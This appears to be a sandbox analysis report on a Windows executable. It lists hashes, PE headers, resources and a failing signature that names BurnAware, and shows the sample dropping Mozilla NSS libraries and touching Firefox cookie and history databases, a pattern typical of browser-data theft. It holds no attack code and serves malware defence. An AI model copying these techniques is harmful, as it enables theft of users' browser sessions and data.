Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll

Download File

Process:	C:\Users\user\Desktop\fXg8zgxVTF.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll

Download File

Process:	C:\Users\user\Desktop\fXg8zgxVTF.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll

Download File

Process:	C:\Users\user\Desktop\fXg8zgxVTF.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\freebl3[1].dll

Download File

Process:	C:\Users\user\Desktop\fXg8zgxVTF.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\mozglue[1].dll

Download File

Process:	C:\Users\user\Desktop\fXg8zgxVTF.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\msvcp140[1].dll

Download File

Process:	C:\Users\user\Desktop\fXg8zgxVTF.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\nss3[1].dll

Download File

Process:	C:\Users\user\Desktop\fXg8zgxVTF.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\softokn3[1].dll

Download File

Process:	C:\Users\user\Desktop\fXg8zgxVTF.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\vcruntime140[1].dll

Download File

Process:	C:\Users\user\Desktop\fXg8zgxVTF.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shm

Download File

Process:	C:\Users\user\Desktop\fXg8zgxVTF.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-shm

Download File

Process:	C:\Users\user\Desktop\fXg8zgxVTF.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	4.441277302585299
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	fXg8zgxVTF.exe
File size:	9'743'208 bytes
MD5:	c7ca98803a76b62a6a379a0b684b162a
SHA1:	00de8f4666fe890f9fd3bf2d405cae32f3c2cc78
SHA256:	7fff867271d6f0f7c301e83dad5875e2194dbf2389ac33130b7711db7e6904bd
SHA512:	e9cf5fb9efd723fd404c10b3451ae6f22a8582041cd97292d09d43baaeb93f0d2f38f40cd9c1927221f8ad746b01490727c853b9a123fc4b34b6ce6ba557fb7b
SSDEEP:	24576:UYCZttSeaoP5LJSkOQv2pjXhFoEQPx4IERmTs6ICUZKVBkPHXNj24:UYCftdbPXSbm2CUZKVBkPHXNjf
TLSH:	D6A6A095AEFCE461D5521EBD103975018EDA7FD1AF14F08EB848BADB1FB31A02314A1B
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........B.O.#v..#v..#v......#v..q...#v..q..i#v..q..V#v......#v..#w..!v..q...#v..q...#v..q...#v.Rich.#v.........PE..L......P...........

File Icon


Icon Hash:	1132072a3b71616e

Static PE Info

General

Entrypoint:	0x427b23
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x50A10C04 [Mon Nov 12 14:47:32 2012 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	4d59408b225bab4cb9c0fde6a6958fe6

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=Microsoft ID Verified CS EOC CA 02, O=Microsoft Corporation, C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	01/10/2024 09:13:12 04/10/2024 09:13:12
Subject Chain	CN=BURNAWARE SL, O=BURNAWARE SL, L=MARBELLA, S=M\xe1laga, C=ES
Version:	3
Thumbprint MD5:	320EFC7267D4C67A9DDFCEF521A10F96
Thumbprint SHA-1:	AF025B469E92BEB6805136B176D57ABE5603F7B7
Thumbprint SHA-256:	A39CF32E949D41020D81CB8CC2D58DFA9314C827B852B1B18E3137FD236AF52E
Serial:	330000C5E8E85060EE75A9C32100000000C5E8

Entrypoint Preview

Instruction
call 00007FB36D03A8BAh
jmp 00007FB36D0341FEh
cmp ecx, dword ptr [0048D800h]
jne 00007FB36D034384h
rep ret
jmp 00007FB36D03A93Ch
int3
int3
int3
int3
push ebp
mov ebp, esp
push edi
push esi
mov esi, dword ptr [ebp+0Ch]
mov ecx, dword ptr [ebp+10h]
mov edi, dword ptr [ebp+08h]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007FB36D03438Ah
cmp edi, eax
jc 00007FB36D03452Ah
cmp ecx, 00000100h
jc 00007FB36D0343A1h
cmp dword ptr [004C8920h], 00000000h
je 00007FB36D034398h
push edi
push esi
and edi, 0Fh
and esi, 0Fh
cmp edi, esi
pop esi
pop edi
jne 00007FB36D03438Ah
pop esi
pop edi
pop ebp
jmp 00007FB36D03AA7Eh
test edi, 00000003h
jne 00007FB36D034397h
shr ecx, 02h
and edx, 03h
cmp ecx, 08h
jc 00007FB36D0343ACh
rep movsd
jmp dword ptr [00427CB4h+edx*4]
nop
mov eax, edi
mov edx, 00000003h
sub ecx, 04h
jc 00007FB36D03438Eh
and eax, 03h
add ecx, eax
jmp dword ptr [00427BC8h+eax*4]
jmp dword ptr [00427CC4h+ecx*4]
nop
jmp dword ptr [00427C48h+ecx*4]
nop
fdivr dword ptr [ebx+42h]
add byte ptr [esp+edi*2], al
inc edx
add byte ptr [eax], ch
jl 00007FB36D0343C4h
add byte ptr [ebx], ah
ror dword ptr [edx-75F877FAh], 1
inc esi
add dword ptr [eax+468A0147h], ecx
add al, cl
jmp 00007FB36D03CB87h

Rich Headers

Programming Language:

[ C ] VS2005 build 50727
[ASM] VS2008 build 21022
[ C ] VS2008 build 21022
[C++] VS2008 build 21022
[IMP] VS2005 build 50727
[RES] VS2008 build 21022
[LNK] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x89828	0x118	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc9000	0x8b8e00	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x946e00	0x3d68	.rsrc
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x6e7a0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x805c8	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x6e000	0x6e0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x895c4	0x80	.rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6c968	0x6ca00	1aaf4034f52a07074507b9c56cd9e50e	False	0.49156267980437285	data	6.46508177572417	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x6e000	0x1dcdc	0x1de00	d9f4d6157f40db8288d3a2acc67d35a7	False	0.2656331720711297	data	4.695574276858226	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x8c000	0x3ca58	0x3400	f2199ed90c2fda01ec0659d7b5029a7c	False	0.2771183894230769	data	4.273007036853196	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xc9000	0x8b8e00	0x8b8e00	edb6d3db0c332dd3fd6c9ef142ec6fff	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_CURSOR	0xcac0c	0x134	Targa image data - RGB 64 x 65536 x 1 +32 "\001"	Russian	Russia	0.4805194805194805
RT_CURSOR	0xcad40	0xb4	Targa image data - Map 32 x 65536 x 1 +16 "\001"	Russian	Russia	0.7
RT_CURSOR	0xcadf4	0x134	AmigaOS bitmap font "(", fc_YSize 4294967264, 5120 elements, 2nd "\377\360?\377\377\370\177\377\377\374\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rd	Russian	Russia	0.36363636363636365
RT_CURSOR	0xcaf28	0x134	Targa image data - RLE 64 x 65536 x 1 +32 "\001"	Russian	Russia	0.35714285714285715
RT_CURSOR	0xcb05c	0x134	data	Russian	Russia	0.37337662337662336
RT_CURSOR	0xcb190	0x134	data	Russian	Russia	0.37662337662337664
RT_CURSOR	0xcb2c4	0x134	Targa image data 64 x 65536 x 1 +32 "\001"	Russian	Russia	0.36688311688311687
RT_CURSOR	0xcb3f8	0x134	Targa image data 64 x 65536 x 1 +32 "\001"	Russian	Russia	0.37662337662337664
RT_CURSOR	0xcb52c	0x134	Targa image data - Mono - RLE 64 x 65536 x 1 +32 "\001"	Russian	Russia	0.36688311688311687
RT_CURSOR	0xcb660	0x134	Targa image data - RGB - RLE 64 x 65536 x 1 +32 "\001"	Russian	Russia	0.38636363636363635
RT_CURSOR	0xcb794	0x134	data	Russian	Russia	0.44155844155844154
RT_CURSOR	0xcb8c8	0x134	data	Russian	Russia	0.4155844155844156
RT_CURSOR	0xcb9fc	0x134	AmigaOS bitmap font "(", fc_YSize 4294966847, 3840 elements, 2nd "\377?\374\377\377\300\003\377\377\300\003\377\377\340\007\377\377\360\017\377\377\370\037\377\377\374?\377\377\376\177\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rd	Russian	Russia	0.5422077922077922
RT_CURSOR	0xcbb30	0x134	data	Russian	Russia	0.2662337662337662
RT_CURSOR	0xcbc64	0x134	data	Russian	Russia	0.2824675324675325
RT_CURSOR	0xcbd98	0x134	data	Russian	Russia	0.3246753246753247
RT_BITMAP	0xcbecc	0x2108	Device independent bitmap graphic, 173 x 42 x 8, image size 0, resolution 3780 x 3780 px/m, 256 important colors	English	Great Britain	0.168519394512772
RT_BITMAP	0xcdfd4	0xd0d8	Device independent bitmap graphic, 424 x 42 x 24, image size 0, resolution 3780 x 3780 px/m	English	Great Britain	0.005835702528804429
RT_BITMAP	0xdb0ac	0x4948	Device independent bitmap graphic, 15 x 390 x 24, image size 0, resolution 3780 x 3780 px/m	English	Great Britain	0.02164179104477612
RT_BITMAP	0xdf9f4	0xadae8	Device independent bitmap graphic, 608 x 390 x 24, image size 0, resolution 3780 x 3780 px/m	English	Great Britain	0.0010402024177677818
RT_BITMAP	0x18d4dc	0x4f60	Device independent bitmap graphic, 17 x 390 x 24, image size 0, resolution 3780 x 3780 px/m	English	Great Britain	0.026673228346456693
RT_BITMAP	0x19243c	0x3c28	Device independent bitmap graphic, 106 x 48 x 24, image size 0, resolution 3780 x 3780 px/m	English	Great Britain	0.02194805194805195
RT_BITMAP	0x196064	0x90e8	Device independent bitmap graphic, 257 x 48 x 24, image size 0, resolution 3780 x 3780 px/m	English	Great Britain	0.008976709079146
RT_BITMAP	0x19f14c	0x78e8	Device independent bitmap graphic, 214 x 48 x 24, image size 0, resolution 3780 x 3780 px/m	English	Great Britain	0.010629361592142672
RT_BITMAP	0x1a6a34	0x2428	Device independent bitmap graphic, 63 x 48 x 24, image size 0, resolution 3780 x 3780 px/m	English	Great Britain	0.04137856525496975
RT_BITMAP	0x1a8e5c	0x1d08	Device independent bitmap graphic, 58 x 42 x 24, image size 0, resolution 3780 x 3780 px/m	English	Great Britain	0.33409580193756727
RT_BITMAP	0x1aab64	0x18a0	Device independent bitmap graphic, 115 x 18 x 24, image size 0, resolution 3780 x 3780 px/m	Russian	Russia	0.19654187817258884
RT_BITMAP	0x1ac404	0x18a0	Device independent bitmap graphic, 115 x 18 x 24, image size 0, resolution 3780 x 3780 px/m	Russian	Russia	0.19257614213197968
RT_BITMAP	0x1adca4	0x18a0	Device independent bitmap graphic, 115 x 18 x 24, image size 0, resolution 3780 x 3780 px/m	Russian	Russia	0.1998730964467005
RT_BITMAP	0x1af544	0x18a0	Device independent bitmap graphic, 115 x 18 x 24, image size 0, resolution 3780 x 3780 px/m	Russian	Russia	0.1930520304568528
RT_BITMAP	0x1b0de4	0x54b28	Device independent bitmap graphic, 1445 x 80 x 24, image size 0, resolution 3780 x 3780 px/m	English	Great Britain	0.07268822783350629
RT_BITMAP	0x20590c	0x54b28	Device independent bitmap graphic, 1445 x 80 x 24, image size 0, resolution 3780 x 3780 px/m	English	Great Britain	0.08297013720742534
RT_BITMAP	0x25a434	0x54b28	Device independent bitmap graphic, 1445 x 80 x 24, image size 0, resolution 3780 x 3780 px/m	English	Great Britain	0.07973307967254699
RT_BITMAP	0x2aef5c	0x54b28	Device independent bitmap graphic, 1445 x 80 x 24, image size 0, resolution 3780 x 3780 px/m	English	Great Britain	0.07470598408855067
RT_BITMAP	0x303a84	0x54b28	Device independent bitmap graphic, 1445 x 80 x 24, image size 0, resolution 3780 x 3780 px/m	English	Great Britain	0.0674766516776202
RT_BITMAP	0x3585ac	0x54b28	Device independent bitmap graphic, 1445 x 80 x 24, image size 0, resolution 3780 x 3780 px/m	English	Great Britain	0.06754583189207887
RT_BITMAP	0x3ad0d4	0x7198	Device independent bitmap graphic, 220 x 44 x 24, image size 0, resolution 3780 x 3780 px/m	English	Great Britain	0.27943603851444293
RT_BITMAP	0x3b426c	0x59e0	Device independent bitmap graphic, 425 x 18 x 24, image size 0, resolution 3780 x 3780 px/m	English	Great Britain	0.05111265646731571
RT_BITMAP	0x3b9c4c	0x59e0	Device independent bitmap graphic, 425 x 18 x 24, image size 0, resolution 3780 x 3780 px/m	English	Great Britain	0.07493045897079277
RT_BITMAP	0x3bf62c	0x59e0	Device independent bitmap graphic, 425 x 18 x 24, image size 0, resolution 3780 x 3780 px/m	English	Great Britain	0.09083796940194715
RT_BITMAP	0x3c500c	0x59e0	Device independent bitmap graphic, 425 x 18 x 24, image size 0, resolution 3780 x 3780 px/m	English	Great Britain	0.10039986091794159
RT_BITMAP	0x3ca9ec	0x59e0	Device independent bitmap graphic, 425 x 18 x 24, image size 0, resolution 3780 x 3780 px/m	English	Great Britain	0.10296418636995827
RT_BITMAP	0x3d03cc	0x59e0	Device independent bitmap graphic, 425 x 18 x 24, image size 0, resolution 3780 x 3780 px/m	English	Great Britain	0.10944019471488178
RT_BITMAP	0x3d5dac	0x59e0	Device independent bitmap graphic, 425 x 18 x 24, image size 0, resolution 3780 x 3780 px/m	English	Great Britain	0.08853442280945759
RT_BITMAP	0x3db78c	0x59e0	Device independent bitmap graphic, 425 x 18 x 24, image size 0, resolution 3780 x 3780 px/m	English	Great Britain	0.07853789986091794
RT_BITMAP	0x3e116c	0x59e0	Device independent bitmap graphic, 425 x 18 x 24, image size 0, resolution 3780 x 3780 px/m	English	Great Britain	0.0885778859527121
RT_BITMAP	0x3e6b4c	0x29e0c	Device independent bitmap graphic, 614 x 93 x 24, image size 0, resolution 3780 x 3780 px/m	English	Great Britain	0.018830305715551617
RT_BITMAP	0x410958	0xf028	Device independent bitmap graphic, 20 x 1024 x 24, image size 0, resolution 3780 x 3780 px/m	English	Great Britain	0.0017891997397527651
RT_BITMAP	0x41f980	0x10f68	Device independent bitmap graphic, 289 x 80 x 24, image size 0, resolution 3780 x 3780 px/m	English	Great Britain	0.17576280944156591
RT_BITMAP	0x4308e8	0x10f68	Device independent bitmap graphic, 289 x 80 x 24, image size 0, resolution 3780 x 3780 px/m	English	Great Britain	0.20040299366724237
RT_BITMAP	0x441850	0x59e0	Device independent bitmap graphic, 425 x 18 x 24, image size 0, resolution 3780 x 3780 px/m	English	Great Britain	0.08866481223922114
RT_BITMAP	0x447230	0x17d68	Device independent bitmap graphic, 650 x 50 x 24, image size 0, resolution 3780 x 3780 px/m	Russian	Russia	0.06504506349856616
